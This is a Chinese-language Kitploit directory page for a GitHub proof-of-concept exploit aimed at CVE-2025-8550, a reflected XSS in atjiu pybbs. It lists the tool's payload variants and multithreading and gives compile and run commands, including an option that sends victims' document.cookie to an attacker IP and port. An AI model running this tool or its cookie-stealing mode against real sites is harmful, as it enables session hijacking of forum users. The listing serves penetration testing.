Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-8550 — CVE-2025-8550 的自动化概念验证漏洞利用程序,针对 atjiu pybbs 中的反射型 XSS。具备 20 多种载荷变体、Cookie 窃取、多线程以及可自定义的 CLI,适用于渗透测试。 | Kitploit
工具/GitHubGitHub/bytereaper77/cve-2025-8550
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Archived
GitHubbytereaper77/cve-2025-8550

CVE-2025-8550

CVE-2025-8550 的自动化概念验证漏洞利用程序,针对 atjiu pybbs 中的反射型 XSS。具备 20 多种载荷变体、Cookie 窃取、多线程以及可自定义的 CLI,适用于渗透测试。

查看仓库
31111个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-8550 – atjiu pybbs XSS 漏洞利用

描述

本仓库托管了一个针对 CVE-2025-8550 的自动概念验证(PoC)漏洞利用工具,该漏洞是 atjiu pybbs(≤ v6.0.0)中的一个反射型跨站脚本(XSS)漏洞。它针对 /admin/topic/list 端点的 username 参数,该参数缺乏适当的输入过滤。

特性

  • 20 多种载荷变体: script、SVG、iframe、object、onerror 处理器等。

  • 自动 URL 编码: 通过 libcurl 的 curl_easy_escape 确保安全注入。

  • Cookie 窃取(可选): 信标注入,将 document.cookie 发送至攻击者控制的服务器。

  • 多线程: 使用 pthreads 并行化攻击尝试,加快测试速度。

  • 可定制的命令行界面: 基于 argparse,支持指定:

    • 目标 URL(-u / --url)
    • 用于认证请求的 Cookie 文件(-c / --cookies)
    • 启用 Cookie 载荷(-k / --cokpay)
    • 攻击者服务器 IP/端口(-i / --ip, -p / --port)
    • 详细日志输出(-v / --verbose)

构建与使用

root@kitploit:~
# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread 

# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]

#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
  • 将 http://<TARGET> 替换为你的 atjiu pybbs 实例。
  • 使用 -k 启用 Cookie 窃取信标(需要同时指定 -i 和 -p)。
  • 如果不需要认证 Cookie,则省略 -c。

参考:

  • NVD 条目:https://nvd.nist.gov/vuln/detail/CVE-2025-8550

许可证:

MIT 许可证

下载工具